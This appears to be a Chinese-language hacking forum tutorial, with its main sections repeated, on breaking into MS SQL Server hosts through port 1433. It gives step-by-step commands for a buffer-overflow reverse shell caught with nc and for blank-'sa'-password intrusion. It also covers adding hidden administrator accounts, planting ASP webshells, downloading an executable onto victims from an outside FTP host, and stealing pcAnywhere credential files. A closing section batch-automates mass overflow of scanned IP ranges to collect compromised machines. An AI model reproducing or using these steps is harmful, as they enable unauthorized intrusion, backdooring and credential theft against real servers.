簡介
1433連線埠是sql server默認連線埠
1433的溢出攻擊
在win2000機器上裝了mssql的話,機器就會開1433連線埠。什麼是連線埠,就像食堂買菜的視窗一樣,你買白菜上1號窗,買西紅柿上2號窗。在機器上買mssql就上1433窗。
溢出1433需要兩個工具:nc.exe和sql2.exe,在www.sandflee.net都有下載。進攻方法就兩步:
第一步,在自己機器上開一個cmd視窗。對了,你要用win2000的話,就開始-運行-寫入cmd回車。這裡我們只用2000,不說98。如果你把你下的nc.exe和sql2.exe和我習慣一樣放在c:盤的話,就在你開的這個視窗下打入命令c:>nc -l -p 40回車。這步的意思是用nc這個工具開一個40的連線埠監聽。
第二步:再在開始-運行-寫入cmd回車,再開一個視窗。在這個視窗寫命令行c:>sql2.exe 你要入侵網站的ip 自己的ip 40 0回車。這裡要作點說明:如何得到入侵網站IP?在cmd下c:>ping www.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以隨意改成別的,但好像40和53成功率高一點。再是命令中的0不行的話,你就試試1或2。如果入侵網站有這個漏洞話,那么你開的第一個視窗就會變成肉雞的c:\winnt\system32>.就是說,你已經進入它的機器里了。進去以後,你可以填加個用戶了。net user guest /active:yes用這個命令,就將默認禁止的guest用戶激活。net user guest 123456這樣guest的密碼變成123456了。net localgroup administrators guest /add這就是guest成為最高許可權的管理員了。
本貼包含圖片附屬檔案:
第二:1433空密碼入侵。1433還有一個漏洞,就是如果默認安裝的話,用戶名是sa,密碼是空的。那么我們就可以用supersqlexec.exe連線上去,這東東在www.sandflee.net也有下。看看入侵方法,我以前在小榕論壇貼的:lcx的win98下sa空密碼入侵腳本20步
1.如何找到sa空密碼肉雞?自己用流光掃吧。
2.注意這是在win98下入侵sa的真實情況。區域網路中的win98,在網咖里。
3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海陽頂端網木馬(黑白)放在本機f:盤
4.用supersqlexec聯接成功。在命令行中輸入:
net user guest /active:yes
(>指肉雞回顯下同)The command completed successfully.
本貼包含圖片附屬檔案:
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
這幾個命令做完後,意思是將guest用戶激活,密碼是123456,並提升為admin。又是這個命令,複習一下。
5.心中暗喜,換到2000系統下啟動流光的種植者給它種個冰河。奇怪了,無論如何也不成功。(其實有時流光種植者不成功,但用手工方法就可以.
6.換個用戶名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失敗。伺服器沒開 ipc$?
7.回到sqlexe命令行中net start lanmanserver肉雞卻顯示ipc$已啟動。為何在這一步流光聯不上,我百思不得其解。我後來換wn2000的cmd下net use \\ip\ipc$ "123456" /user:"guest"也不能聯接成功。
8.換個思路吧。在本機上將f:設為共享,在dos下ipconfig.exe得知自己本機ip
9.回到sqlexe命令行中net use x: \\本機ip\f,將自己本機f:盤映射成為肉雞的x:盤。過了一會,伺服器顯示命令成功完成.
10.sqlexe命令行中運行set得知其主頁位置在d:\inetpub\wwwroot。不錯,伺服器支持asp.你如果看不懂這 個命令,也可以根據其主頁上某個圖像檔案名稱,然後dir *.jpg/s查找其主頁位置。
11.sqlexe命令行中copy x:\cmd.asp d:\inetpub\wwwroot,這個目錄是肉雞網站的目錄。
12.回到ie中http://伺服器ip/cmd.asp,出現了ie界面的dos.建個資料夾看看。
md d:\inetpub\wwwroot\aspmm
13.sqlexec命令行中copy x:\海陽頂端網木馬\*.* d:\inetpub\wwwroot\aspmm\.再將目錄隱藏
attrib +h d:\inetpub\wwwroot\aspmm
14.現在你可以用海陽頂端網木馬上傳任意檔案了。完全控制了肉雞的文本檔案。當然你也可以通過映射來 copy.呀!這台伺服器不支持fso,海陽頂端網木馬無法運行。那么我們試一下ftp上傳。先將自己的檔案*.exe上傳到個人主頁空間。
15.在自己本機上建立up.txt內容如下:
open ftp1.go.163.com(說明:這裡是指我用得是網易ftp)
username(說明:你的上傳用戶名)
password(說明:密碼)
get lcx.exe(說明:你要上傳到肉雞的檔案名稱)
bye(說明:退出ftp)
通過映射copy到肉雞的c:\up.txt
16.sqlexec命令行中ftp -s:c:\up.txt(註:ftp的用法你在win2000里的幫助里可以很詳細查到)等一會你 就看到lcx.exe已經在肉雞在\winnt\system32\下了。
17.運氣好的話應該可以ipc聯接成功,開個連線埠進去的。然後就可以做個代理、做個跳板了,可惜我運氣 不好,這台機器無法ipc$成功,流光種植者無法聯接。上傳了好幾個exe木馬也無法運行。如何運行你上 傳的木馬,就看第二節
18. 通過仔細查找,得知肉雞裝了PcAnywhere.查*.cif,該檔案卻在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere這裡,好深的目錄。怎樣copy它呢?
19.通過一天的dos8.3規則的補習才知應是這樣 :
copy c:\winnt\Profiles\alluse~1\applic~2\symantec\pcanyw~1\*.cif d:\inetpub\wwwroot\.然後通過 ie下載。其實,也可以用asp寫一個小程式copy.
20.流光cif檔案解碼,得知用戶名和密碼。唯一遺憾的是ipc$無法成功,無法開連線埠進去,guest用戶卻可 以激活不知什麼原因。
其實用supersqlexec.exe連上以後,可以有很多方法。像還可以用echo寫我在第15步提到的那個up.txt.
echo 你要寫的 >>up.txt就可以了,雖然肉雞回顯說寫失敗,其實已經成功了。就像一個人喊捉賊,賊嚇跑了,家裡卻早亂了。注意,你用echo一次只可寫一行
1433連線埠的入侵
第一:1433的溢出攻擊。在win2000機器上裝了mssql的話,機器就會開1433連線埠。什麼是連線埠,就像食堂買菜的視窗一樣,你買白菜上1號窗,買西紅柿上2號窗。在機器上買mssql就上1433窗。溢出1433需要兩個工具:nc.exe和sql2.exe,在www.sandflee.net都有下載。進攻方法就兩步:第一步,在自己機器上開一個cmd視窗。對了,你要用win2000的話,就開始-運行-寫入cmd回車。這裡我們只用2000,不說98。如果你把你下的nc.exe和sql2.exe和我習慣一樣放在c:盤的話,就在你開的這個視窗下打入命令c:>nc -l -p 40回車。這步的意思是用nc這個工具開一個40的連線埠監聽。第二步:再在開始-運行-寫入cmd回車,再開一個視窗。在這個視窗寫命令行c:>sql2.exe 你要入侵網站的ip 自己的ip 40 0回車。這裡要作點說明:如何得到入侵網站ip?在cmd下c:>pingwww.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以隨意改成別的,但好像40和53成功率高一點。再是命令中的0不行的話,你就試試1或2。如果入侵網站有這個漏洞話,那么你開的第一個視窗就會變成肉雞的c:\\winnt\\system32>.就是說,你已經進入它的機器里了。進去以後,你可以填加個用戶了。net user guest /active:yes用這個命令,就將默認禁止的guest用戶激活。net user guest 123456這樣guest的密碼變成123456了。net localgroup administrators guest /add這就是guest成為最高許可權的管理員了。
第二:1433空密碼入侵。1433還有一個漏洞,就是如果默認安裝的話,用戶名是sa,密碼是空的。那么我們就可以用supersqlexec.exe連線上去,這東東在www.sandflee.net也有下。
1.如何找到sa空密碼肉雞?自己用流光掃吧。
2.注意這是在win98下入侵sa的真實情況。區域網路中的win98,在網咖里。
3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海陽頂端網木馬(黑白)放在本機f:盤
4.用supersqlexec聯接成功。在命令行中輸入:
net user guest /active:yes
(>指肉雞回顯下同)The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
這幾個命令做完後,意思是將guest用戶激活,密碼是123456,並提升為admin。又是這個命令,複習一下。
5.心中暗喜,換到2000系統下啟動流光的種植者給它種個冰河。奇怪了,無論如何也不成功。(其實有時流光種植者不成功,但用手工方法就可以,是這樣的,看這裡)。
6.換個用戶名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失敗。伺服器沒開 ipc$?
7.回到sqlexe命令行中net start lanmanserver肉雞卻顯示ipc$已啟動。為何在這一步流光聯不上,我百思 不得其解。(註:net start命令列表) 我後來換wn2000的cmd下net use \\\\ip\\ipc$ "123456" /user:"guest"也不能聯接成功。
8.換個思路吧。在本機上將f:設為共享,在dos下ipconfig.exe得知自己本機ip
9.回到sqlexe命令行中net use x: \\\\本機ip\\f,將自己本機f:盤映射成為肉雞的x:盤。過了一會,伺服器顯示命令成功完成。(lcx註:NET命令的詳細用法)
10.sqlexe命令行中運行set得知其主頁位置在d:\\inetpub\\wwwroot。不錯,伺服器支持asp.你如果看不懂這 個命令,也可以根據其主頁上某個圖像檔案名稱,然後dir *.jpg/s查找其主頁位置。
11.sqlexe命令行中copy x:\\cmd.asp d:\\inetpub\\wwwroot,這個目錄是肉雞網站的目錄。
12.回到ie中http://伺服器ip/cmd.asp,出現了ie界面的dos.建個資料夾看看。
md d:\\inetpub\\wwwroot\\aspmm
13.sqlexec命令行中copy x:\\海陽頂端網木馬\\*.* d:\\inetpub\\wwwroot\\aspmm\\.再將目錄隱藏
attrib +h d:\\inetpub\\wwwroot\\aspmm
14.現在你可以用海陽頂端網木馬上傳任意檔案了。完全控制了肉雞的文本檔案。當然你也可以通過映射來 copy.呀!這台伺服器不支持fso,海陽頂端網木馬無法運行。那么我們試一下ftp上傳。先將自己的檔案*.exe上傳到個人主頁空間。
15.在自己本機上建立up.txt內容如下:
open ftp1.go.163.com(說明:這裡是指我用得是網易ftp)
username(說明:你的上傳用戶名)
password(說明:密碼)
get lcx.exe(說明:你要上傳到肉雞的檔案名稱)
bye(說明:退出ftp)
通過映射copy到肉雞的c:\\up.txt
16.sqlexec命令行中ftp -s:c:\\up.txt(註:ftp的用法你在win2000里的幫助里可以很詳細查到)等一會你 就看到lcx.exe已經在肉雞在\\winnt\\system32\\下了。
17.運氣好的話應該可以ipc聯接成功,開個連線埠進去的。然後就可以做個代理、做個跳板了,可惜我運氣 不好,這台機器無法ipc$成功,流光種植者無法聯接。上傳了好幾個exe木馬也無法運行。如何運行你上 傳的木馬,就看第二節
18. 通過仔細查找,得知肉雞裝了pcanywhere.查*.cif,該檔案卻在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere這裡,好深的目錄。怎樣copy它呢?
19.通過一天的dos8.3規則的補習才知應是這樣 :
copy c:\\winnt\\Profiles\\alluse~1\\applic~2\\symantec\\pcanyw~1\\*.cif d:\\inetpub\\wwwroot\\.然後通過 ie下載。其實,也可以用asp寫一個小程式copy.我這兒寫了一個。我放在這裡了。說明:
http://www.s8s8.net/cgi-bin/topic.cgi?forum=26&topic=741
20.流光cif檔案解碼,得知用戶名和密碼。唯一遺憾的是ipc$無法成功,無法開連線埠進去,guest用戶卻可 以激活不知什麼原因。
其實用supersqlexec.exe連上以後,可以有很多方法。像還可以用echo寫我在第15步提到的那個up.txt.
echo 你要寫的 >>up.txt就可以了,雖然肉雞回顯說寫失敗,其實已經成功了。就像一個人喊捉賊,賊嚇跑了,家裡卻早亂了。注意,你用echo一次只可寫一行.
第一:1433的溢出攻擊。在win2000機器上裝了mssql的話,機器就會開1433連線埠。什麼是連線埠,就像食堂買菜的視窗一樣,你買白菜上1號窗,買西紅柿上2號窗。在機器上買mssql就上1433窗。溢出1433需要兩個工具:nc.exe和sql2.exe,在www.sandflee.net都有下載。進攻方法就兩步:第一步,在自己機器上開一個cmd視窗。對了,你要用win2000的話,就開始-運行-寫入cmd回車。這裡我們只用2000,不說98。如果你把你下的nc.exe和sql2.exe和我習慣一樣放在c:盤的話,就在你開的這個視窗下打入命令c:>nc -l -p 40回車。這步的意思是用nc這個工具開一個40的連線埠監聽。第二步:再在開始-運行-寫入cmd回車,再開一個視窗。在這個視窗寫命令行c:>sql2.exe 你要入侵網站的ip 自己的ip 40 0回車。這裡要作點說明:如何得到入侵網站ip?在cmd下c:>pingwww.xxxxx.com就可以看到了。自己的ip呢?在cmd下c:>ipconfig就可以看到了。其中命令行中的40你可以隨意改成別的,但好像40和53成功率高一點。再是命令中的0不行的話,你就試試1或2。如果入侵網站有這個漏洞話,那么你開的第一個視窗就會變成肉雞的c:\\winnt\\system32>.就是說,你已經進入它的機器里了。進去以後,你可以填加個用戶了。net user guest /active:yes用這個命令,就將默認禁止的guest用戶激活。net user guest 123456這樣guest的密碼變成123456了。net localgroup administrators guest /add這就是guest成為最高許可權的管理員了。
第二:1433空密碼入侵。1433還有一個漏洞,就是如果默認安裝的話,用戶名是sa,密碼是空的。那么我們就可以用supersqlexec.exe連線上去,這東東在www.sandflee.net也有下。
1.如何找到sa空密碼肉雞?自己用流光掃吧。
2.注意這是在win98下入侵sa的真實情況。區域網路中的win98,在網咖里。
3.工具:supersqlexec.exe、cmd.asp(www.sandflee.net有下)海陽頂端網木馬(黑白)放在本機f:盤
4.用supersqlexec聯接成功。在命令行中輸入:
net user guest /active:yes
(>指肉雞回顯下同)The command completed successfully.
net user guest 123456
> The command completed successfully
net localgroup administrators guest /add
> The command completed successfully.
這幾個命令做完後,意思是將guest用戶激活,密碼是123456,並提升為admin。又是這個命令,複習一下。
5.心中暗喜,換到2000系統下啟動流光的種植者給它種個冰河。奇怪了,無論如何也不成功。(其實有時流光種植者不成功,但用手工方法就可以,是這樣的,看這裡)。
6.換個用戶名吧。回到supersqlexe.exe的命令模式net user lcx 123456 /add,命令失敗。伺服器沒開 ipc$?
7.回到sqlexe命令行中net start lanmanserver肉雞卻顯示ipc$已啟動。為何在這一步流光聯不上,我百思 不得其解。(註:net start命令列表) 我後來換wn2000的cmd下net use \\\\ip\\ipc$ "123456" /user:"guest"也不能聯接成功。
8.換個思路吧。在本機上將f:設為共享,在dos下ipconfig.exe得知自己本機ip
9.回到sqlexe命令行中net use x: \\\\本機ip\\f,將自己本機f:盤映射成為肉雞的x:盤。過了一會,伺服器顯示命令成功完成。(lcx註:net命令的詳細用法)
10.sqlexe命令行中運行set得知其主頁位置在d:\\inetpub\\wwwroot。不錯,伺服器支持asp.你如果看不懂這 個命令,也可以根據其主頁上某個圖像檔案名稱,然後dir *.jpg/s查找其主頁位置。
11.sqlexe命令行中copy x:\\cmd.asp d:\\inetpub\\wwwroot,這個目錄是肉雞網站的目錄。
12.回到ie中http://伺服器ip/cmd.asp,出現了ie界面的dos.建個資料夾看看。
md d:\\inetpub\\wwwroot\\aspmm
13.sqlexec命令行中copy x:\\海陽頂端網木馬\\*.* d:\\inetpub\\wwwroot\\aspmm\\.再將目錄隱藏
attrib +h d:\\inetpub\\wwwroot\\aspmm
14.現在你可以用海陽頂端網木馬上傳任意檔案了。完全控制了肉雞的文本檔案。當然你也可以通過映射來 copy.呀!這台伺服器不支持fso,海陽頂端網木馬無法運行。那么我們試一下ftp上傳。先將自己的檔案*.exe上傳到個人主頁空間。
15.在自己本機上建立up.txt內容如下:
open ftp1.go.163.com(說明:這裡是指我用得是網易ftp)
username(說明:你的上傳用戶名)
password(說明:密碼)
get lcx.exe(說明:你要上傳到肉雞的檔案名稱)
bye(說明:退出ftp)
通過映射copy到肉雞的c:\\up.txt
16.sqlexec命令行中ftp -s:c:\\up.txt(註:ftp的用法你在win2000里的幫助里可以很詳細查到)等一會你 就看到lcx.exe已經在肉雞在\\winnt\\system32\\下了。
17.運氣好的話應該可以ipc聯接成功,開個連線埠進去的。然後就可以做個代理、做個跳板了,可惜我運氣 不好,這台機器無法ipc$成功,流光種植者無法聯接。上傳了好幾個exe木馬也無法運行。如何運行你上 傳的木馬,就看第二節
18. 通過仔細查找,得知肉雞裝了pcanywhere.查*.cif,該檔案卻在C:/WINNT/Profiles/All Users/Application Data/Symantec/pcAnywhere這裡,好深的目錄。怎樣copy它呢?
19.通過一天的dos8.3規則的補習才知應是這樣 :
copy c:\\winnt\\Profiles\\alluse~1\\applic~2\\symantec\\pcanyw~1\\*.cif d:\\inetpub\\wwwroot\\.然後通過 ie下載。其實,也可以用asp寫一個小程式copy.我這兒寫了一個。我放在這裡了。說明:
http://www.s8s8.net/cgi-bin/topic.cgi?forum=26&topic=741
20.流光cif檔案解碼,得知用戶名和密碼。唯一遺憾的是ipc$無法成功,無法開連線埠進去,guest用戶卻可 以激活不知什麼原因。
其實用supersqlexec.exe連上以後,可以有很多方法。像還可以用echo寫我在第15步提到的那個up.txt.
echo 你要寫的 >>up.txt就可以了,雖然肉雞回顯說寫失敗,其實已經成功了。就像一個人喊捉賊,賊嚇跑了,家裡卻早亂了。注意,你用echo一次只可寫一行.
1433連線埠溢出全自動批處理
近日一QQ上的兄弟跟我說他近日用1433溢出,一天得到二十台雞,我狂暈!
問了一下,他說用批處理實現,呵呵!於是有了此文!
在開始前,先準備工具,如下:
溢出工具,監聽工具 ,記事本,易優字典生成器,掃描小工具
1.掃呀 掃到的IP保存下來
至於用什麼掃,隨你,我是上肉雞掃的,所以在CMD下撒,用小工具scanner狂掃1433的哈哈
!保存IP成列表,再導入另一個小工具,LScanPort2.0beta版,用來掃其中開了3389的機子,再保存IP成另一個列表,OK!
上面的意思,懂了吧,就是掃開了1433 和3389的 機子,其實方法好多的,代理獵手也可以,看自己吧!有好工具別忘了在後面跟貼!!
2.做成批處理
首先說一下格式是:
sqlhello.exe 溢出IP 連線埠 本地IP 聽的連線埠
就這樣。。把掃到的全替換成這樣`
就OK了`
呵呵,就這樣,可是至於如何實現呢,我想你不會每個IP段前後加幾句話,累死人的大哥!
於是我找呀找,用到記事本的替換功能,比如你掃的IP段是219.111.***.*** 則可以用替換功能將219.替換成sqlhello.exe 219.懂了吧,這是前面!
至於後面呢,我找了一個小工具,易優字典生成器,它有一個功能就是修改字典,在每個後面插入字元(此功能不註冊可以用),在前面插入字元(此功能要註冊)不破解有限制,我找了一個破解補丁就可了!後面加上1433 你的IP 監聽連線埠 ,OK,這樣可以了吧
好了,再另外儲存為bat檔案,呵呵呵 !
我呢,懶得存為BAT還上傳到肉雞,暈!
我是在對方的CMD下copy con 1.bat
然後複製剛才做好的呵呵,保存就可了!
把溢出程式和NC上傳到1.bat所在目錄,就可以了!
3.開始呀,執行批處理,用NC監聽
開一個CMD執行批處理,開始狂溢出!
1.bat
同時,開一個CMD監聽撒!
nc -l -p 連線埠
4.如果運氣好,就會得到對方的shell
我中午上課前在肉雞上測試了一下,成功率不太理想,兩台!當時要上課了,我也沒來得及放什麼後門,加了個用戶提到管理員就走人了!
再下課來,都跑了!!
至於想在對方的CMD下下載什麼的,請看我的關於CMD中的下載
至於開3389 開TELNET的,網上教程多的是,呵!
至於做隱藏賬號之類的,得到管理員密碼的,請看我的關於賬號,關於如何得到管理員密碼!
OK,到此吧,有好的意見,好的思路,共享撒!
火狐是個大家庭,得靠我們自己撒!
補充一下:
用NC得到對方的shell後,另一個CMD還在狂溢出,哈哈!所以呢,用ctrl+C
啦,哈哈!搞定一台,再來開始又一輪狂溢出,如此下去,祝你好運!